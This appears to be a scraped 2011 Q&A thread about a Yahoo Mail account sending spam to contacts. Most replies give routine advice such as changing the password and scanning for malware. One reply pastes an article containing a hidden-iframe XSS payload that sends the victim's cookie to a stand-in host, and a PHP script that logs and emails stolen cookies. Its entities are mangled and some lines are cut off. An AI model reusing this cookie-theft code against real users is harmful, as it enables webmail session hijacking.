Saturday, December 17, 2011

My friends are saying I'm sending emails,but doesn't show in my outbox. How do I stop the emails?

Your account got compromised. First change your password. Account help.http://help.yahoo.com/l/us/yahoo/acct/in鈥?/a> for just about anything to do with your account. Then run anti Virus and Anti Spyware. Should be fine then.|||This happened to me recently. They are using a security hole in the client side of the browser which allows a hacker to rewrite a cookie accessing your email contacts via PHP embedded in the email and is currently undetectable by Yahoo Mail. The IP address from the originating email for my case came from this IP address 183.89.26.154 (this can be found in the full email header) which I tracked it down to Thailand. The link sent out to all my contacts accesses a website in Poland (a fake Canadian Pharmacy page) which will grab more emails based on the PHP Script similar to that below.





I have currently deleted all my cookies and cleared all my saved passwords in Firefox and have also installed Spybot Search and Destroy since my virus scanner (Eset Smart Security) and MS Malicious Software Removal Tool didn't find anything. After you do all the above, change your password and clear your cookies out frequently. Update: Also, DO NOT USE "KEEP ME SIGNED IN" check box by Yahoo when signing in, I believe this is "THE" problem based on the article I found below. Use Firefox browser's way to store the passwords since they are not cookie based. Here is a copy and paste of what I found.





How hackers steal yahoo passwords





This article is ment to provide more info on how to protect your yahoo account and every account in general and should not be used for stealing someone's info, password etc. It's purely informative. My yahoo Id was recently accessed by an unknown person which used it to send promotional emails to my list of friends who, of course, accessed them leaving the hacker another open door, and another and so on, the chain never ends. Hopefully yahoo wakes up. I did a search on this new thing that they use, it had to be something on the "client side", a bug that could be sent inside an email, a new thing, undetected by yahoo, yet - it's easyer to attack than to deffend they say. It didn't take me too much to find this code which writes the recipient's cookie (stored in C:/ under the Cookies folder) inside a .log file that is copy-pasted by the hacker overwriting his own cookie that yahoo stored inside his computer and than easilly accessing the victim's yahoo email. The bug:





%26lt;DIV id=b style="VISIBILITY: hidden"%26gt;


%26lt;STYLE onload="window.status='';


var x = escape(document.cookie).substr(0,1900);


b.innerHTML='%26lt;iframe src=http://your-site-here.com/script.php鈥?br>

id='+document.title.substring


(document.title.indexOf('-')+2)+'%26amp;cook鈥?br>

frameborder=0 width=10 height=10%26gt;%26lt;/iframe%26gt;';" type=text/css%26gt;


%26lt;/STYLE%26gt;


%26lt;/DIV%26gt;





...which calls this php script:





$file="cookie.log";


if (isset($_REQUEST["id"]) %26amp;%26amp; isset($_REQUEST["cookie"])){


$logcookie = $_REQUEST["cookie"];


$logcookie = rawurldecode($logcookie);


$logemail = $_REQUEST["id"];


$logemail = rawurldecode($logemail);


if (file_exists($file)) {


$handle=fopen($file, "r+");


$filecontence=fread($handle,filesize("鈥?br>

fclose($handle);


}


$handle=fopen($file, "w");


fwrite($handle, "$logemail - $logcookie\n$filecontence\n ");


//Writing email address and cookie then the rest of the log


fclose($handle);


mail("email", "$logemail", "$logemail\n$logcookie\n$filecontence\n"鈥?br>

}


header("Location: http://mail.yahoo.com");





...which writes the cookie to the hackers .log file that resides on his server. A very simple example but so deadly. NOTE: The code is a little changed to make it hard to use without PHP knowledge. How to protect yourself? My advice: DON'T EVER OPEN EMAILS FROM AN UNKNOWN SENDER.|||this same thing happened to me. What I was told to do was change my password. I do not know what that has to do with it, but the emails did stop for me.|||The emails would be in the sent box if you're curious, but the previous poster is right, change your password (make it difficult) and you should be sorted.|||It seems that you've got virus on your computer, so buy an anti-virus or download one for free (there are lots of options avg free, avast, etc). Scan your computer and you'll be saved.

No comments:

Post a Comment